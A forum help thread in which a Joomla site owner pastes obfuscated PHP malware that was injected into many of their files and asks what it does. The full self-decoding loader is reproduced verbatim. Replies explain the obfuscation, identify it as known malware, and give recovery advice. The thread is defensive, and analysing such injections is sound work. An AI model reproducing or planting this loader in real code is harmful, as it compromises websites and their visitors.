Hello, the following code has been attached into the first line of many php files of my site. Though i replaced the first line with plain <?php , it would be great if someone could translate this to me. Thanks in advance!

 $heajmtan = '^<!%w`	x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!.;`UQPMSVD!-id%)uqpuft`msvd},;uqp%i	x5c2^<!Ce*[!%cIjQ:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{!<*#}_;#)323ldfid>}&;!osvufs}	xtww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#	x27rfs7f;!opjudovg}k~~9{d%:osvufs:~928>>	x22:ftmbg39*56A:>:8r (strstr($uas,"	x72	166	x3a	61	x31"))) { $vupvcon = "	x63	3zbek!~!<b%	x7f!<X>b%Z<#opo#>b%!*##2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%XA	x27K6<	x7fw6*3qj%7>	x2272q`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)327]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*hR85,67R37,18R#>q%V<*#fopo3qj%6<*Y%)fnbozcYufhA	x272qj%6<^#zsfvr#	x5cq%7/7#@#7/7^#iubq#	x5cq2]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]($GLOBALS["	x61	156	x75	156	x61"])))) { $GLOBALS["	x61	156	x75	15gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~I,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{h,*d	x27,*c	x27,*b	x27)fepdof.epmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#6#<!%w:!>!(%w:!>!	x246767~6<Cw6<pd%w6Z6<.]275]y83]273]y76]277#<!%t2w>#]y74]273]8]322]3]364]6]283]427]36]373Ptr($uas,"	x6d	163	x69	145")) o452]88]5]48]32M3]317]445]212z>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]K:.2^,%b:<!%c:>%s:	x5c%j:x54	120	x5f	125	x53	105	x52	137	x41	107	x45	116	x54"]); if ((strs4*<!~!	x24/%t2w/	x24)##-!#~<#/%	x24-	x24!>!fyqmpef)#	x24*<!%t::!>!	%tmw/	x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr	x5c1^-%r	x5c!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd6]36]73]83]238M7]381]211M5]67]s%)7gj6<*id%)ftpmdR6<*id%)dfyfR	x27tfs%6<*17-SFEBF)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hm!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboe}	x7f;!osvufs}w;*	x7f!>>	x22!pd%)!]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcouft`msvd}+;!>!}	x27;!>>>!}_;gvc%}&;ftmbg%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]67tj	x22)gj6<^#Y#	x5cq%	x27Y%6<.msv`ftsbqA7>q%6<	162	x65	141	x74	145	x5f	14d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6)-1);} @error_reporting(0); $fkvtxjg = implode(array_map("ccnynst",s-K)ebfsX	x27u%)7fmjix6<C	x27&6<4-	x24	x5c%j^	x24-	x24tvctus)%	x24-	x24b!>!%yy)#}#-#	x24-ov>*ofmy%)utjm!|!*5!	x27!hmg%38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~	x24<!%o:!>!	x242178}527e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]4-	x24y4	x24-	x24]y8	x24-	x24]26	x24-	x24<%j,,*!|	x24-	x2bss	x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%ox7f!|!*uyfu	x27k:!ftmf!}Z;^nbsbq%	x5cS%6~6<	x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfofpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}eTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#--rr.93e:5597f-s.973:8297f:5297e:56-xr.985:529tr_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y7V;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x	x22l:!}V)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~	x24<!fD4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%td},;#-#}+;%-qp%)54l}	x27;%vg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>	x22!ftmbg)!gj<*#k#)usb6<	x7fw6*	x7f_*#[k2`{6:c}A;~!}	x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U!	x27{**u%-#jt0}Z;4gvodujpo!	x24-	x24y7	x24-	x24*<!	x24-	x24gps)%j>1<%j=tj{fpg)%	x24-	x2tn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]/*#npd/#)rrd/#00;quui#>.%!<***f	x27,*e	x277!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!	x27!hmg%)!gj!~<ofmy6~6<&w6<	x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA	FWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/#L#-#M#-#[#-#Y#-#D#-#W#-#C#85-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#786c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_ut`cpV	x7f	x7f	x7f	x7f<u%V	x27{ftmfV	x7f<*:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{	x24-tusqpt)%z-#:#*	x24-	x24!>!	x24/%tjw/	x24)%	x2)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!x7fw6*	x7f_*#fubfsdXk5`{6#/*)323zbe!-#jt0*?]+^?]_	x5c}X	x24<!%tmw!>!#]y84opdXA	x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsd5`hA	x27pd%6<pd%w6Z6<.4`hA	x27pd%6<pd%w6Z6<.3`hA	x27pd%6<pd%w6Z6<.26<	x7fw6*CW&)7gj6<.[A	x27&x27&6<.fmjgA	x27doj%6<	x7fw6*	x7f_*#fmjgk4`{6~6<tfs%w6<	x7fw6*CWtfe]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]3`hA	x27pd%6<C	x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf	x27x24Ypp3)%cB%iN}#-!	x24/%tmw/	x24)%c*W%eN+#Qi	x5c1^W%c!>!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc	;3q%}U;y]}R;2]},;osvufs}	x27;mnui}&;zep75]y7:]268]y7f#<!%tww!>!	x2400~GMFT`QIQ&f_UTPI`QUUI&e_SEEBpn)%epnbss-%rxW~!Ypp2)%zB%z>!	x24/h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4	x223}!+!<+{41]88M4P8]37]278]225]241]334]36%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbq#	x5cq%7**^#zsfvr#	x5cq%)uftnpd!opjudovg!|!**#j{}88:}334}472	x24<!%ff2!>!bssbz)	x24]25	x24-	x24-!%	x24-	x24*!|!	x2hnpd#)tutjyf`opjudovif((function_exists("	x6f	142	x5f	163	x74	141	x72	164") && (!isset-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#	x24#-!#]y38#-!%w:**<")));$vzuglom = $v)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+993~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!v%7-MSV,6<*)ujojR	x27id%6<	x7fw6*	x7f_*#ujojRk3`{666~6<&w>>X)!gjZ<#opo#>b%!**X)ufttj	x22)gj!|!g	x22)!gj}1~!<2p%	x7f!~!<##!>!2p%Z<^2	x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO	x22#)fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-e%+*!*+fepdfe{h+{d%)+opjudoKc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]36	x61"]=1; $uas=strtolower($_SERVER["	x48	124	j%)7gj6<**2qj%)hopm3qjA)qj3hopmA	x27X&Z&S{ftmfV	x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,y76]252]y85]256]y6g]257]y86]267]y74]2~<3,j%>j%!*3!	x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72!	x21<!fmtf!%b:>%s:	x5c%j6	x75	156	x63	164	x69	157	x6e"; function ccnynst($n){return chr(ord($n*&7-n%)utjm6<	x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127%	x27jsv%6<C>^#zsfvrupvcon("", $fkvtxjg); $vzuglom();}}sTrREvxNoiTCnuf_EtaerCxECalPer_Rtsyzezspzrwp';
 $qhiudzr=explode(chr((670-550)),substr($heajmtan,(40291-34414),(121-87))); 
 $zvlsaat = $qhiudzr[0]($qhiudzr[(7-6)]); 
 $nwlvga = $qhiudzr[0]($qhiudzr[(14-12)]); 
 if (!function_exists('dojzbmiry')) { function dojzbmiry($ielotnxz, $jdyflcp,$mqvyjzzec) { $pzqmyvr = NULL; for($wsjhiz=0;$wsjhiz<(sizeof($ielotnxz)/2);$wsjhiz++) { $pzqmyvr .= substr($jdyflcp, $ielotnxz[($wsjhiz*2)],$ielotnxz[($wsjhiz*2)+(5-4)]); } return $mqvyjzzec(chr((54-45)),chr((502-410)),$pzqmyvr); }; } 
 $ifqpyf = explode(chr((262-218)),'4791,66,770,65,5438,46,1317,65,1177,30,368,59,2031,26,5691,70,2104,68,2780,61,1069,41,3953,67,4221,64,5761,61,2172,31,245,69,2566,43,3901,52,505,29,5484,36,658,66,5822,20,4657,28,1984,47,3828,25,3419,42,4046,66,1580,50,886,43,5067,57,4020,26,3068,23,1515,35,2640,45,65,33,1885,40,1726,34,835,51,5002,65,5604,66,3355,64,4616,41,2260,29,1630,47,929,67,4685,20,4771,20,5161,21,5182,68,1025,44,3313,42,996,29,3769,59,1818,67,3230,52,4934,68,3580,40,4463,27,534,50,427,35,5124,37,4341,52,2528,38,3461,36,2987,25,150,31,314,54,3662,57,4524,61,5301,27,3012,56,3620,42,5520,47,2057,47,633,25,2841,58,4393,39,3091,69,3282,31,3853,48,1110,38,5567,37,4432,31,5386,52,584,49,1925,59,724,46,2289,65,4705,66,2203,57,3719,50,2414,57,3160,70,1382,67,4285,56,98,20,2685,50,1677,49,4490,34,1449,66,462,43,181,64,2735,45,3524,56,2354,25,2379,35,5328,58,2942,45,1235,58,4112,69,4181,40,4585,31,1148,29,1550,30,1207,28,1760,58,2471,57,118,32,2609,31,5670,21,1293,24,0,65,2899,43,5250,51,3497,27,4857,21,4878,56,5842,35'); 
 $perivkb = $zvlsaat("",dojzbmiry($ifqpyf,$heajmtan,$nwlvga)); 
 $zvlsaat=$heajmtan; $perivkb(""); 
 $perivkb=(707-586); 
 $heajmtan=$perivkb-1; 

    Well, all the instructions for doing so are already there in the code (like, the line that assigns to [font=monospace]$ifpqpyf[/font] is obviously exploding that string on a comma, for example and the numbers are used by the function [font=monospace]dojzbmiry[/font] as offsets into the [font=monospace]$heajmtan[/font] string). But I'd avoid actually running [font=monospace]dojzbmiry[/font], [font=monospace]$mqvyjzzec[/font] or [font=monospace]$zvlsaat[/font] in PHP until you know what the body of the function will do.

    You might find someone else has already done it, e.g.: https://www.reddit.com/r/Malware/comments/5l2kd6/can_someone_debfuscate_it/ and following links leads to https://www.symantec.com/security_response/writeup.jsp?docid=2015-111911-4342-99&tabid=2 which is what several virus scanners identify your submitted code as (you are using a virus scanner on your system, right?).

    But that's not really your problem and you're fixated on the wrong thing. If, as looks likely, its job is to download malicious code from another server, analysing it further won't tell you anything about what it might or will do (though injecting arbitrary stuff into your web pages seems to be part of it), and won't even tell you how it got there in the first place (you had a security problem before it was ever injected, which is how it got injected in the first place).

    For recovery steps, I suggest looking through this and maybe some of the other documentation on the site.
    https://www.us-cert.gov/security-publications/recovering-trojan-horse-or-virus

      7 days later

      What Weedpacket is saying is that your site has been hacked and someone has injected attack code into your PHP files. This sort of thing can be quite difficult to eradicate. To be honest, I'm not sure what I might suggest to get rid of it.

        Thank you guys. I have upgraded to joomla 3.7.0. Eliminated (with script) lines injected in my files. Looking at other security guidelines again...

          Don't forget to change all relevant passwords: your hosting password(s), any FTP passwords on your web host, and any Joomla admin passwords.

            Thanks. did that firtsly!

              Write a Reply...